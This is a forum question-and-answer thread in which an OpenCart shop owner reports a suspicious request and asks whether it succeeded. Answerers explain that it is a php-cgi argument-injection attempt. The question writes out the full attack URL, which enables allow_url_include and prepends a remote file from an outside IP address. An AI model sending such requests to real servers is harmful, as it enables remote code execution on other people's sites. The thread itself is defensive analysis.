PHP security failure

Asked

Viewed 492 times

3

I noticed an unusual activity on my site (e-commerce opencart 2.0.2.0)

this is the command they used

http://www.meusite.com.br/? -d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp:/49.212.157.58/policy/r. txt

I don’t know exactly what it looks like exploiting a php fault and entering a backdoor I have the code q was injected or not yet apparently he deleted the text from the server he was on but I made a copy in case someone wants to analyze me let me know I send.

Now my question how to know if his attack was successful how to fix the problem?

php security-guard

  • This was the file that he inserted http://49.212.157.58/policy/r.txt, it seems to be a PHP function, you noticed some different file?

  • 4

    It is not a security flaw in PHP. It is merely a ridiculous attempt at "php Injection". It happens thousands of times every day on every website.. In your case, the parameters themselves do absolutely nothing.

  • @Danielomine this should be for "old things" php.

2 answers

3

This is an invasion attempt that is worth a PHP vulnerability in CGI mode where php-cgi receives the query string as command line arguments, allowing options to be included via URL.

By decoding the URL you can read the settings the attacker tried to enter:

-d allow_url_include=On -d auto_prepend_file=http://49.212.157.58/policy/r.txt

The option -d sets a new value for an INI entry and if successful all PHP entries would include (and run) the remote file r.txt, which opens up many possibilities of what the invader could do.

2

Theoretically, from the code posted in the url, they tried to make an attack where, using a possible enabling allow_url_include in php.ini, they tried to run a command via url (I think in some previous versions of PHP there was this fault), which would cause the file policy/r.txt be included in any php script automatically.

That is, if the attacker succeeded, it would probably be tragic for you.

Maybe what happened in this case is an attempt by exploit.

It is worth remembering that, because they try to invade your system, does not mean that they have been successful.

Browser other questions tagged php security-guard

You are not signed in. Login or sign up in order to post.